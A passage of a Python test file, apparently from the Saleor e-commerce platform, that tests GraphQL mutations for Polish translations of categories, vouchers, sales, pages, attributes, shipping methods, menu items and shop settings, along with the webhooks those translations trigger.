mutation categoryTranslate($categoryId: ID!, $input: TranslationInput!) {
categoryTranslate(
id: $categoryId, languageCode: PL,
input: $input) {
category {
translation(languageCode: PL) {
name
description
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_category_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
category,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
category_id = graphene.Node.to_global_id("Category", category.id)
response = staff_api_client.post_graphql(
CATEGORY_TRANSLATE_MUTATION,
{"categoryId": category_id, "input": {"name": "Kategoria PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["categoryTranslate"]
assert data["category"]["translation"]["name"] == "Kategoria PL"
assert data["category"]["translation"]["language"]["code"] == "PL"
translation = category.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_category_create_translation_by_translatable_content_id(
staff_api_client,
category,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"CategoryTranslatableContent", category.id
)
response = staff_api_client.post_graphql(
CATEGORY_TRANSLATE_MUTATION,
{"categoryId": translatable_content_id, "input": {"name": "Kategoria PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["categoryTranslate"]
assert data["category"]["translation"]["name"] == "Kategoria PL"
assert data["category"]["translation"]["language"]["code"] == "PL"
def test_category_create_translation_for_description(
staff_api_client, category, permission_manage_translations
):
category_id = graphene.Node.to_global_id("Category", category.id)
description = dummy_editorjs("description", True)
response = staff_api_client.post_graphql(
CATEGORY_TRANSLATE_MUTATION,
{"categoryId": category_id, "input": {"description": description}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["categoryTranslate"]
assert data["category"]["translation"]["name"] is None
assert data["category"]["translation"]["description"] == description
assert data["category"]["translation"]["language"]["code"] == "PL"
def test_category_create_translation_for_description_name_as_null(
staff_api_client, category, permission_manage_translations
):
category_id = graphene.Node.to_global_id("Category", category.id)
description = dummy_editorjs("description", True)
response = staff_api_client.post_graphql(
CATEGORY_TRANSLATE_MUTATION,
{
"categoryId": category_id,
"input": {"name": None, "description": description},
},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["categoryTranslate"]
assert data["category"]["translation"]["name"] is None
assert data["category"]["translation"]["description"] == description
assert data["category"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_category_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
category,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = category.translations.create(language_code="pl", name="Kategoria")
category_id = graphene.Node.to_global_id("Category", category.id)
response = staff_api_client.post_graphql(
CATEGORY_TRANSLATE_MUTATION,
{"categoryId": category_id, "input": {"name": "Kategoria PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["categoryTranslate"]
assert data["category"]["translation"]["name"] == "Kategoria PL"
assert data["category"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
VOUCHER_TRANSLATE_MUTATION = """
mutation voucherTranslate($voucherId: ID!) {
voucherTranslate(
id: $voucherId, languageCode: PL,
input: {name: "Bon PL"}) {
voucher {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_voucher_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
voucher,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
voucher_id = graphene.Node.to_global_id("Voucher", voucher.id)
response = staff_api_client.post_graphql(
VOUCHER_TRANSLATE_MUTATION,
{"voucherId": voucher_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["voucherTranslate"]
assert data["voucher"]["translation"]["name"] == "Bon PL"
assert data["voucher"]["translation"]["language"]["code"] == "PL"
translation = voucher.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_voucher_create_translation_by_translatable_content_id(
staff_api_client,
voucher,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"VoucherTranslatableContent", voucher.id
)
response = staff_api_client.post_graphql(
VOUCHER_TRANSLATE_MUTATION,
{"voucherId": translatable_content_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["voucherTranslate"]
assert data["voucher"]["translation"]["name"] == "Bon PL"
assert data["voucher"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_voucher_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
voucher,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = voucher.translations.create(language_code="pl", name="Kategoria")
voucher_id = graphene.Node.to_global_id("Voucher", voucher.id)
response = staff_api_client.post_graphql(
VOUCHER_TRANSLATE_MUTATION,
{"voucherId": voucher_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["voucherTranslate"]
assert data["voucher"]["translation"]["name"] == "Bon PL"
assert data["voucher"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
SALE_TRANSLATION_MUTATION = """
mutation saleTranslate($saleId: ID!) {
saleTranslate(
id: $saleId, languageCode: PL,
input: {name: "Wyprz PL"}) {
sale {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_sale_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
sale,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
sale_id = graphene.Node.to_global_id("Sale", sale.id)
response = staff_api_client.post_graphql(
SALE_TRANSLATION_MUTATION,
{"saleId": sale_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["saleTranslate"]
assert data["sale"]["translation"]["name"] == "Wyprz PL"
assert data["sale"]["translation"]["language"]["code"] == "PL"
translation = sale.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_sale_create_translation_by_translatable_content_id(
staff_api_client,
sale,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"SaleTranslatableContent", sale.id
)
response = staff_api_client.post_graphql(
SALE_TRANSLATION_MUTATION,
{"saleId": translatable_content_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["saleTranslate"]
assert data["sale"]["translation"]["name"] == "Wyprz PL"
assert data["sale"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_sale_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
sale,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = sale.translations.create(language_code="pl", name="Sale")
sale_id = graphene.Node.to_global_id("Sale", sale.id)
response = staff_api_client.post_graphql(
SALE_TRANSLATION_MUTATION,
{"saleId": sale_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["saleTranslate"]
assert data["sale"]["translation"]["name"] == "Wyprz PL"
assert data["sale"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
PAGE_TRANSLATE_MUTATION = """
mutation pageTranslate($pageId: ID!, $input: PageTranslationInput!) {
pageTranslate(
id: $pageId, languageCode: PL,
input: $input) {
page {
translation(languageCode: PL) {
title
content
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_page_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
page,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
page_id = graphene.Node.to_global_id("Page", page.id)
response = staff_api_client.post_graphql(
PAGE_TRANSLATE_MUTATION,
{"pageId": page_id, "input": {"title": "Strona PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["pageTranslate"]
assert data["page"]["translation"]["title"] == "Strona PL"
assert data["page"]["translation"]["language"]["code"] == "PL"
translation = page.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_page_create_translation_for_content(
staff_api_client, page, permission_manage_translations
):
page_id = graphene.Node.to_global_id("Page", page.id)
content = dummy_editorjs("content", True)
response = staff_api_client.post_graphql(
PAGE_TRANSLATE_MUTATION,
{"pageId": page_id, "input": {"content": content}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["pageTranslate"]
assert data["page"]["translation"]["title"] is None
assert data["page"]["translation"]["content"] == content
assert data["page"]["translation"]["language"]["code"] == "PL"
def test_page_create_translation_for_content_title_as_null(
staff_api_client, page, permission_manage_translations
):
page_id = graphene.Node.to_global_id("Page", page.id)
content = dummy_editorjs("content", True)
response = staff_api_client.post_graphql(
PAGE_TRANSLATE_MUTATION,
{"pageId": page_id, "input": {"title": None, "content": content}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["pageTranslate"]
assert data["page"]["translation"]["title"] is None
assert data["page"]["translation"]["content"] == content
assert data["page"]["translation"]["language"]["code"] == "PL"
def test_page_create_translation_by_translatable_content_id(
staff_api_client,
page,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"PageTranslatableContent", page.id
)
response = staff_api_client.post_graphql(
PAGE_TRANSLATE_MUTATION,
{"pageId": translatable_content_id, "input": {"title": "Strona PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["pageTranslate"]
assert data["page"]["translation"]["title"] == "Strona PL"
assert data["page"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_page_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
page,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = page.translations.create(language_code="pl", title="Strona")
page_id = graphene.Node.to_global_id("Page", page.id)
response = staff_api_client.post_graphql(
PAGE_TRANSLATE_MUTATION,
{"pageId": page_id, "input": {"title": "Strona PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["pageTranslate"]
assert data["page"]["translation"]["title"] == "Strona PL"
assert data["page"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
ATTRIBUTE_TRANSLATE_MUTATION = """
mutation attributeTranslate($attributeId: ID!) {
attributeTranslate(
id: $attributeId,
languageCode: PL,
input: {name: "Kolor PL"}
) {
attribute {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_attribute_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
color_attribute,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.id)
response = staff_api_client.post_graphql(
ATTRIBUTE_TRANSLATE_MUTATION,
{"attributeId": attribute_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["attributeTranslate"]
assert data["attribute"]["translation"]["name"] == "Kolor PL"
assert data["attribute"]["translation"]["language"]["code"] == "PL"
translation = color_attribute.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_attribute_create_translation_by_translatable_content_id(
staff_api_client,
color_attribute,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"Attribute", color_attribute.id
)
response = staff_api_client.post_graphql(
ATTRIBUTE_TRANSLATE_MUTATION,
{"attributeId": translatable_content_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["attributeTranslate"]
assert data["attribute"]["translation"]["name"] == "Kolor PL"
assert data["attribute"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_attribute_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
color_attribute,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = color_attribute.translations.create(language_code="pl", name="Kolor")
attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.id)
response = staff_api_client.post_graphql(
ATTRIBUTE_TRANSLATE_MUTATION,
{"attributeId": attribute_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["attributeTranslate"]
assert data["attribute"]["translation"]["name"] == "Kolor PL"
assert data["attribute"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
ATTRIBUTE_VALUE_TRANSLATE_MUTATION = """
mutation attributeValueTranslate($attributeValueId: ID!, $name: String) {
attributeValueTranslate(
id: $attributeValueId,
languageCode: PL,
input: { name: $name }
) {
attributeValue {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_attribute_value_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
pink_attribute_value,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
attribute_value_id = graphene.Node.to_global_id(
"AttributeValue", pink_attribute_value.id
)
response = staff_api_client.post_graphql(
ATTRIBUTE_VALUE_TRANSLATE_MUTATION,
{"attributeValueId": attribute_value_id, "name": "Róż PL"},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["attributeValueTranslate"]
assert data["attributeValue"]["translation"]["name"] == "Róż PL"
assert data["attributeValue"]["translation"]["language"]["code"] == "PL"
translation = pink_attribute_value.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_attribute_value_create_translation_by_translatable_content_id(
staff_api_client, pink_attribute_value, permission_manage_translations
):
translatable_content_id = graphene.Node.to_global_id(
"AttributeValueTranslatableContent", pink_attribute_value.id
)
response = staff_api_client.post_graphql(
ATTRIBUTE_VALUE_TRANSLATE_MUTATION,
{"attributeValueId": translatable_content_id, "name": "Róż PL"},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["attributeValueTranslate"]
assert data["attributeValue"]["translation"]["name"] == "Róż PL"
assert data["attributeValue"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_attribute_value_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
pink_attribute_value,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = pink_attribute_value.translations.create(
language_code="pl", name="Różowy"
)
attribute_value_id = graphene.Node.to_global_id(
"AttributeValue", pink_attribute_value.id
)
response = staff_api_client.post_graphql(
ATTRIBUTE_VALUE_TRANSLATE_MUTATION,
{"attributeValueId": attribute_value_id, "name": "Róż PL"},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["attributeValueTranslate"]
assert data["attributeValue"]["translation"]["name"] == "Róż PL"
assert data["attributeValue"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
SHIPPING_PRICE_TRANSLATE = """
mutation shippingPriceTranslate(
$shippingMethodId: ID!, $input: ShippingPriceTranslationInput!
) {
shippingPriceTranslate(
id: $shippingMethodId,
languageCode: PL,
input: $input
) {
shippingMethod {
translation(languageCode: PL) {
name
description
language {
code
}
}
}
errors {
message
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shipping_method_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
shipping_method,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethodType", shipping_method.id
)
description = dummy_editorjs("description", True)
variables = {
"shippingMethodId": shipping_method_id,
"input": {"name": "DHL PL", "description": description},
}
response = staff_api_client.post_graphql(
SHIPPING_PRICE_TRANSLATE,
variables,
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["shippingPriceTranslate"]
assert data["shippingMethod"]["translation"]["name"] == "DHL PL"
assert data["shippingMethod"]["translation"]["description"] == description
assert data["shippingMethod"]["translation"]["language"]["code"] == "PL"
translation = shipping_method.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_shipping_method_create_translation_by_translatable_content_id(
staff_api_client,
shipping_method,
permission_manage_translations,
):
translatable_content_id = graphene.Node.to_global_id(
"ShippingMethodTranslatableContent", shipping_method.id
)
description = dummy_editorjs("description", True)
variables = {
"shippingMethodId": translatable_content_id,
"input": {"name": "DHL PL", "description": description},
}
response = staff_api_client.post_graphql(
SHIPPING_PRICE_TRANSLATE,
variables,
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["shippingPriceTranslate"]
assert data["shippingMethod"]["translation"]["name"] == "DHL PL"
assert data["shippingMethod"]["translation"]["description"] == description
assert data["shippingMethod"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shipping_method_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
shipping_method,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = shipping_method.translations.create(language_code="pl", name="DHL")
query = """
mutation shippingPriceTranslate($shippingMethodId: ID!) {
shippingPriceTranslate(
id: $shippingMethodId, languageCode: PL,
input: {name: "DHL PL"}) {
shippingMethod {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethodType", shipping_method.id
)
response = staff_api_client.post_graphql(
query,
{"shippingMethodId": shipping_method_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["shippingPriceTranslate"]
assert data["shippingMethod"]["translation"]["name"] == "DHL PL"
assert data["shippingMethod"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
MENU_ITEM_TRANSLATE = """
mutation menuItemTranslate($menuItemId: ID!) {
menuItemTranslate(
id: $menuItemId, languageCode: PL,
input: {name: "Odnośnik PL"}
) {
menuItem {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_menu_item_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
menu_item,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = menu_item.translations.create(language_code="pl", name="Odnośnik")
translatable_content_id = graphene.Node.to_global_id(
"MenuItemTranslatableContent", menu_item.id
)
response = staff_api_client.post_graphql(
MENU_ITEM_TRANSLATE,
{"menuItemId": translatable_content_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["menuItemTranslate"]
assert data["menuItem"]["translation"]["name"] == "Odnośnik PL"
assert data["menuItem"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
def test_menu_item_create_translation_by_translatable_content_id(
staff_api_client,
menu_item,
permission_manage_translations,
):
menu_item_id = graphene.Node.to_global_id("MenuItem", menu_item.id)
response = staff_api_client.post_graphql(
MENU_ITEM_TRANSLATE,
{"menuItemId": menu_item_id},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["menuItemTranslate"]
assert data["menuItem"]["translation"]["name"] == "Odnośnik PL"
assert data["menuItem"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shop_create_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
site_settings,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
query = """
mutation shopSettingsTranslate {
shopSettingsTranslate(
languageCode: PL, input: {headerText: "Nagłówek PL"}) {
shop {
translation(languageCode: PL) {
headerText
language {
code
}
}
}
}
}
"""
response = staff_api_client.post_graphql(
query, permissions=[permission_manage_translations]
)
data = get_graphql_content(response)["data"]["shopSettingsTranslate"]
assert data["shop"]["translation"]["headerText"] == "Nagłówek PL"
assert data["shop"]["translation"]["language"]["code"] == "PL"
translation = site_settings.translations.first()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_CREATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
SHOP_SETTINGS_TRANSLATE_MUTATION = """
mutation shopSettingsTranslate($input: ShopSettingsTranslationInput!) {
shopSettingsTranslate(
languageCode: PL, input: $input) {
shop {
translation(languageCode: PL) {
headerText
language {
code
}
}
}
errors {
field
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shop_update_translation(
mocked_webhook_trigger,
mocked_get_webhooks_for_event,
any_webhook,
staff_api_client,
site_settings,
permission_manage_translations,
settings,
):
mocked_get_webhooks_for_event.return_value = [any_webhook]
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
translation = site_settings.translations.create(
language_code="pl", header_text="Nagłówek"
)
response = staff_api_client.post_graphql(
SHOP_SETTINGS_TRANSLATE_MUTATION,
{"input": {"headerText": "Nagłówek PL"}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["shopSettingsTranslate"]
assert data["shop"]["translation"]["headerText"] == "Nagłówek PL"
assert data["shop"]["translation"]["language"]["code"] == "PL"
translation.refresh_from_db()
expected_payload = generate_translation_payload(translation, staff_api_client.user)
mocked_webhook_trigger.assert_called_once_with(
expected_payload,
WebhookEventAsyncType.TRANSLATION_UPDATED,
[any_webhook],
translation,
SimpleLazyObject(lambda: staff_api_client.user),
)
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shop_translation_validates_values_lengths(
mocked_webhook_trigger,
staff_api_client,
site_settings,
permission_manage_translations,
settings,
):
settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
response = staff_api_client.post_graphql(
SHOP_SETTINGS_TRANSLATE_MUTATION,
{"input": {"headerText": "Nagłówek PL" * 100}},
permissions=[permission_manage_translations],
)
data = get_graphql_content(response)["data"]["shopSettingsTranslate"]
assert data["shop"] is None
assert data["errors"] == [{"field": "headerText", "code": "INVALID"}]
@pytest.mark.parametrize(
"kind, expected_typename",
[
(TranslatableKinds.PRODUCT, "ProductTranslatableContent"),
(TranslatableKinds.COLLECTION, "CollectionTranslatableContent"),
(TranslatableKinds.CATEGORY, "CategoryTranslatableContent"),
(TranslatableKinds.PAGE, "PageTranslatableContent"),
(TranslatableKinds.SHIPPING_METHOD, "ShippingMethodTranslatableContent"),
(TranslatableKinds.VOUCHER, "VoucherTranslatableContent"),
(TranslatableKinds.SALE, "SaleTranslatableContent"),
(TranslatableKinds.ATTRIBUTE, "AttributeTranslatableContent"),
(TranslatableKinds.ATTRIBUTE_VALUE, "AttributeValueTranslatableContent"),
(TranslatableKinds.VARIANT, "ProductVariantTranslatableContent"),
(TranslatableKinds.MENU_ITEM, "MenuItemTranslatableContent"),
],
)
def test_translations_query(
staff_api_client,
permission_manage_translations,
product,
published_collection,
voucher,
sale,
shipping_method,
page,
menu_item,
kind,
expected_typename,
):
query = """
query TranslationsQuery($kind: TranslatableKinds!) {
translations(kind: $kind, first: 1) {
edges {
node {
__typename
}
}
totalCount
}
}
"""
response = staff_api_client.post_graphql(
